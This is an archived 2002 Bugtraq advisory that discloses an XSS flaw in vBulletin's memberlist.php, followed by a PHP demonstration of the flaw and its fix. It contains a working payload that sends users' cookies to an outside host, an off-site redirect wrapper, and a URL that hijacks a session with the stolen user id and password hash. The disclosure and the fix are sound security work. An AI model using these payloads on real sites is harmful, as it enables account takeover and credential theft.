Bugtraq mailing list archives
memberlist.php of vBulletin
From: <plato () swgmotu com>
Date: Thu, 21 Mar 2002 19:26:36 -0500
vBulletin ALL versions
Vendor status: notified 3/18/2; no response

Within the first few lines of code in memberlist.php, the variable $letterbits is evaled. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

    http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E

(vbulletin.com has apparently patched their installation somehow), I can steal the user's password hash and user id.

Because of the way vB parses URLs, the above will not function inside the forum, but if we put this in an off-site HTML file:

    <script>
    location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
    </script>

and then link to it instead, the exploit will work as intended... the user doesn't even have to be aware of what has transpired... the above link will proceed first to the memberlist w/ cookie-stealing code, and then to my <shameless plug>Star Wars Galaxies Player Association's homepage, http://www.swgmotu.com </shameless plug>.

With the recorded user id and password hash, we can access the site:

    http://www.vbulletin.com/forum/index.php?bbuserid=[user id]&bbpassword=[password hash]

I have tried this successfully on five other users besides myself (all with consent).

I believe the simplest fix would be to initialize letterbits ($letterbits = "";) at the top of memberlist.php.

~Plato
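The uninitialised-variable pattern the post describes, reconstructed as an added example in PHP. This is not vBulletin's memberlist.php code: register_globals is simulated explicitly so the script also runs on a PHP build with it off, and every name other than $letterbits (the simulate_register_globals helper, the link format, the attacker host) is an assumption made for illustration. It places the vulnerable form beside the fix the post suggests.

```php
<?php
// Added example, not vBulletin's code. Names other than $letterbits are
// assumptions for illustration.
//
// With register_globals on (the PHP 4 default at the time of the post), every
// query-string parameter becomes a global variable before any script code
// runs. That is what lets ?letterbits=<script>... seed $letterbits. The
// helper below reproduces that behaviour explicitly.
function simulate_register_globals(array $query)
{
    foreach ($query as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// Vulnerable form: $letterbits is never initialised, so the loop appends the
// letter links to whatever the request already placed in the global, and the
// attacker-supplied prefix is returned as part of the page markup.
function letterbits_vulnerable(array $letters)
{
    global $letterbits;
    foreach ($letters as $letter) {
        $letterbits .= '<a href="memberlist.php?what=' . $letter . '">' . $letter . '</a> ';
    }
    return $letterbits;
}

// Hardened form: the post's fix, initialising $letterbits before use, so
// request data can no longer seed it. The letters are additionally escaped
// before being placed in HTML, the general rule for any non-constant output.
function letterbits_fixed(array $letters)
{
    $letterbits = '';
    foreach ($letters as $letter) {
        $safe = htmlspecialchars($letter, ENT_QUOTES);
        $letterbits .= '<a href="memberlist.php?what=' . $safe . '">' . $safe . '</a> ';
    }
    return $letterbits;
}

// Constructed request: the decoded shape of the post's payload, pointed at a
// placeholder host rather than the one in the post.
$query = array(
    'letterbits' => '<script>location="http://attacker.example/record.php?cook="'
                  . '+escape(document.cookie)</script>',
);
simulate_register_globals($query);

$letters = array('A', 'B', 'C');

echo "Vulnerable:\n", letterbits_vulnerable($letters), "\n\n";
echo "Fixed:\n", letterbits_fixed($letters), "\n";
```

Run it with the PHP CLI; the vulnerable output carries the injected script element ahead of the letter links, while the fixed output contains the links alone, because the local assignment shadows the request-populated global.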
Current thread:
- memberlist.php of vBulletin plato (Mar 22)
- <Possible follow-ups>
- Re: memberlist.php of vBulletin John Percival (Mar 25)